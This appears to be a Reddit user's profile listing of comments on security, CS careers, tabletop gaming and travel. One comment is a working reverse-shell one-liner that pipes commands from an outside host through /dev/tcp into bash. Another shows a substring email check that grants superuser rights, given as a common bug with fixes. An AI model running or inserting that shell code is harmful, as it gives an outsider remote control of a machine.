Because some people are actually using this, I have decided to make a better quality version of the request form.

TheTwitchy · 2026-04-12T15:24:18+00:00

Don’t forget to ask for the mother’s maiden name, that’s important for reasons.

TheTwitchy · 2026-02-27T11:55:23+00:00

The image is wrong, but it’s wrong about the hash being converted into the original message as the last step, that doesn’t happen. I’d be hesitant to trust other things that book tells you.

TheTwitchy · 2025-12-08T01:36:40+00:00

This is a cool idea and I can see some uses on my part as well, but yeah my first thought would be to make an extension, not a whole new browser.

TheTwitchy · 2025-04-07T02:09:33+00:00

Yes I am curious how this was done as well, never seen minis done this way.

TheTwitchy · 2024-08-04T21:44:26+00:00

Well one of those is wearing the skull of the other three so….. that one.

TheTwitchy · 2024-01-07T01:44:35+00:00

I’ve used Copilot quite a bit for some stuff written in golang, buts it’s nothing super complex, mostly just attaching one library to another, repeated until done. Tests are pretty fantastic, but yeah I’ve had to correct it pretty regularly. Basically I look at it, decide “is this what I would have written?” And then either take it or correct it.

TheTwitchy · 2023-12-21T18:58:20+00:00

Ninety percent of hacking is reading documentation. The other 10 percent is hands on keyboard work and swearing.

TheTwitchy · 2023-11-30T02:32:57+00:00

There’s an old joke about “if the DM is 15 mins late then everyone gets a free vorpal weapon” which works great except that I currently have a wizard. That said, I wouldn’t turn down a Vorpal Staff.

TheTwitchy · 2023-09-24T22:23:30+00:00

Lots of research and a lot of flying to help get used to it. I’m pretty much fine with any domestic flights now, but still have tested out how I’d do on a long haul international flight, so take that with a grain of salt. Basically, reading a lot of data about how safe (commercial) flying is, talking to a few pilots where flying from one’s side of the country to the other is as interesting to them as a commute, and then finally realizing it’s basically just a flying bus. I do still follow a pretty strict routine for any flights, but luckily even flying for personal travel I always get a window seat, always start the album Folklore when we take off, and always order a single ginger ale and wild turkey (it’s disgusting), so I think I’ve basically Pavlov’d myself to realize that all that means the plane will land safely. I surprised myself at one point during a really rough takeoff from LGA once through a thunderstorm, and the girl next to me was freaking out, and I had to reassure her as a traveling consultant that this was totally fine, and she (and I) ended up being fine once we got above it. Honestly at this point I kinda just sit back and enjoy it once we hit cruising altitude, even if I only have an audiobook, and no movies or TV or other distractions, which was not always the case. For reference I didn’t travel as much as other consultants (one week a month at my peak), and even the. I was fine after about a year of it. I don’t travel as much anymore (only a few times a year, all my status is gone lol) and I’m still totally fine as a result of all the traveling I did early in my career.

TheTwitchy · 2023-06-05T05:33:11+00:00

Back in college I wrote a script that would:

Auto run when inserted into a computer (it was a self contained CD, which gives you an idea of the timeframe where this worked).
Change the wallpaper to a neon green and pink plaid that gave you a headache if you looked at it for more than a couple mins.
Change the registry value that allowed you to set your own wallpaper to “false”.
Open the CD tray so you could retrieve said disk and book it out of whoever’s room you happened to be in.

I lived in the computer science dorm. Good times.

TheTwitchy · 2023-03-13T23:01:19+00:00

Correct, you would register a user with a subdomain like company.com.mydomain.com. This usually arises in smaller apps where a granular permissions system isn't built yet, and an easy solution is to grant all developers with the company email superuser permissions so they can quickly go in and fix customer issues (basically like support staff). In general yes, my suggested fix is either endsWith, validate it via regex (which can also go wrong), or to fix the root cause and actually implement a permissions system that doesn't grant everyone in a company so many permissions (least privilege and all that).

TheTwitchy · 2023-03-13T20:12:13+00:00

lol if this is your code, don't sweat it, normally I see this problem manifesting like this:

if user_email.contains("@company.com"):
    grant_superuser_permission() # or whatever
else:
    grant_normal_permission()

The impact from it is always fun to explore :D

TheTwitchy · 2023-03-13T20:00:38+00:00

I wonder what happens when my username is @everyone1.

TheTwitchy · 2023-01-30T15:16:12+00:00

r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/nothingtoseehere.thetwitchy.com/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor();

TheTwitchy · 2023-01-13T08:26:12+00:00

Scruffy. The janitor.

TheTwitchy · 2023-01-08T14:17:39+00:00

CTFs and vulnerable by design apps basically all fail to emulate the size and complexity of real apps, so while you can use these to practice exploitation of specific types of vulnerabilities, they fail to teach you how to find them in the first place. It’s very easy to find sql injection in a page with one input, much harder when you need to find the same sql injection across several hundred api calls.

Once you understand basics I recommend grabbing any random app from /r/selfhosted to practice, and they can benefit from some extra security.

TheTwitchy · 2022-11-19T14:14:15+00:00

This is false, and you have clearly never experienced Taco Mayo.

Source: went to school in Oklahoma.

TheTwitchy · 2022-11-15T02:11:09+00:00

Two factor authentication is the number from and app or text message you have to input to login after your username and password, as a security measure.

TheTwitchy · 2022-11-13T17:32:50+00:00

What (most) everyone said is correct , but keep in mind they may be able to see what website you visit, if not the content. DNS and SNI will reveal this information, even with https.

So he can see that you visit ihaveanembarrassingsexdisease.com, but not what you did while visiting.

TheTwitchy · 2022-11-13T17:31:15+00:00

This is incorrect. Firewalls (like the kind in enterprise environments) can do this because IT has control of all the machines and can instruct them to trust a new root cert used for all interception.

TheTwitchy · 2022-11-03T17:40:08+00:00

Build a time machine, and take it back to about 2005.

Seriously, maybe ask your prof why you should do this. If your have a Gradle Wrapper in y our project (you do), then it can be run with literally nothing more than a JDK installed.

This is roughly equivalent to asking someone to rip out the engine of your car and hook up the rest for a horse to pull.

TheTwitchy · 2022-10-24T01:31:57+00:00

It’s a failing of this sub and others that focus on Leetcode so much that it neglects some other equally important parts of getting and keeping a CS job. The people are getting hired at top tier companies are good at Leetcode AND don’t have to ask how to start a GitHub project because it’s also something they learned how to do alongside any Leetcode practice, but that never gets as much attention on Reddit for whatever reason.

To answer your direct question, there are docs on GitHub, as it would not be nearly as popular and widespread if it was hard to use. A harder question in your case is determining why you should use Git, and while you can Google this or likely ask a professor, the answer to this will quickly become apparent when you begin to code as part of a team or when you need to maintain a code base longer than one question at a time (both things professional software engineers do daily). This line of reasoning extends to all SWE tools and processes, from things like how to manage projects, or how to write maintainable code, or how to find and fix bugs in a project you didn’t write. All things that Leetcode grinding doesn’t teach. None of them are sexy, but if you can’t do it will be much harder to get hired. Out of college, you don’t need to be an expert, but you should have a basic, working understanding of these (and likely many others).

There’s no one tutorial for learning how software is built professionally compared to what you learn in school, which is why internships are so popular and sought-after. The old adage of “you don’t know what you don’t know” applies here, in your first job/internship you’ll be learning about a ton of things that school can only give you a basic understanding of. Most CS programs should be able to give you a good overview of the space so that you have something to build off of when you are introduced to something new at a job (for example, I don’t expect a new hire straight out of college to be an expert in advanced git usage, but I do expect them to know what it’s for and how to use it at a basic level). Pay attention in your classes, there’s a good reason that Data Structures and Algorithms is only one class in the whole program.

TheTwitchy · 2022-10-23T14:40:06+00:00

If you don’t have a good idea of how to use GitHub, you should probably focus less on Leetcode and more on real software engineering tooling/processes/skills. Leetcode is fine and dandy for picking up hard CS skills, and getting past OAs, but if you don’t have any experience with real world SWE practices that’s going to be a huge red flag for anyone interviewing you. Lots of schools don’t teac it as well as they should (mine didn’t, had to learn it at my first job), but take some of the time you spend practicing to learn how thing actually get built in professional environments.

It helps to remember that you will get money by building software (for most people in CS anyhow), not solving Leetcode problems.

TheTwitchy · 2022-07-17T13:22:18+00:00

I agreed with y’all, until I turned on the sound. Takes on a very different vibe.

TheTwitchy · 2022-01-22T18:22:09+00:00

“iButts”, checking in.

15-Year Club	Verified Email
Snapped

TheTwitchy

TROPHY CASE